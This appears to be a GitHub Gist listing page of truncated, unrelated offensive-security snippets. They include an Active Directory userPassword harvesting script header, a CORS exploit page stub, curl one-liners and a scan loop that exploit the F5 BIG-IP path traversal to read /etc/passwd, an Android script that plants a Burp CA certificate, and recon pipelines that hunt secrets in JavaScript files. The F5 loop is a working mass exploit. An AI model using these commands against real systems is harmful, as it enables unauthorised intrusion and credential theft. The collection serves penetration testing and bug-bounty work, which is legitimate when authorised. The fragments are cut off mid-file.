This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
This script enumerates user accounts in Active Directory and then collects | |
their .userPassword properties, decodes them and prints out. | |
Assuming we have PowerView's Get-DomainUser command available. | |
Usage: | |
PS> . .\Get-UserPasswordEntries.ps1 | |
PS> Get-UserPasswordEntries | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>CORS PoC Exploit</title> | |
</head> | |
<body> | |
<center> | |
<h1>CORS Exploit<br>secureITmania</h1> | |
<hr> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | \ | |
grep -q Vulnerable && \ | |
printf '\033[0;31mVulnerable\n' || \ | |
printf '\033[0;32mNot Vulnerable\n' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
##### (Cosmetic) Colour output | |
RED="\033[01;31m" # Issues/Errors | |
GREEN="\033[01;32m" # Success | |
YELLOW="\033[01;33m" # Warnings/Information | |
BLUE="\033[01;34m" # Heading | |
BOLD="\033[01;01m" # Highlight | |
RESET="\033[00m" # Normal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
while read ip ; do if [[ $(curl -skL -m 1 --no-keepalive --connect-timeout 2 "https://$ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -io "root:x") == "root:x" ]] | |
then | |
echo -e "\033[0;31m""Vulnerable Big-IP in ==> $ip""\033[0m" | |
fi ; done < $1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
#httpx | |
tabhttpx0=$(httpx -h 2>&1 | grep " -" | awk -F " " '{print $1}' | sed -z 's/\n/ /g') | |
tabhttpx='echo -e "$tabhttpx0"' | |
complete -W "\$($tabhttpx)" httpx | |
#subfinder | |
tabsub0=$(subfinder -h 2>&1 | grep " -" | awk -F " " '{print $1}' | sed -z 's/\n/ /g') | |
tabsub='echo -e "$tabsub0"' | |
complete -W "\$($tabsub)" subfinder | |
#naabu |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
curl -s http://burp/cert -x http://127.0.0.1:8080 -o cacert.der | |
openssl x509 -inform DER -in cacert.der -out cacert.pem | |
export CERT_HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1) | |
adb root && adb remount | |
adb push cacert.pem "/sdcard/${CERT_HASH}.0" | |
adb shell su -c "mv /sdcard/${CERT_HASH}.0 /system/etc/security/cacerts" | |
adb shell su -c "chmod 644 /system/etc/security/cacerts/${CERT_HASH}.0" | |
rm -rf cacert.* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import requests | |
import time | |
import os | |
import json | |
import sys | |
headers = { | |
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0', | |
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ------Instructions--------- | |
# Install (and configure) subfinder, assetfinder, and httprobe | |
# go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder | |
# cat firefox.sh >> ~/.bashrc | |
# source ~/.bashrc | |
# Usage - subf_ff target.tld | |
# asset_ff target.tld | |
subf_ff () { | |
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# replace $mytarget with your target | |
gau $mytarget|egrep -iv '\.json'|grep -iE '\.js'|antiburl|awk '{print $4}' | xargs -I %% bash -c 'python3 SecretFinder.py -i %% -o cli' | |
# use -r option for extract anything | |
gau $mytarget|egrep -iv '\.json'|grep -iE '\.js'|antiburl|awk '{print $4}' | xargs -I %% bash -c 'python3 SecretFinder.py -i %% -o cli -r "$anything"' |
OlderNewer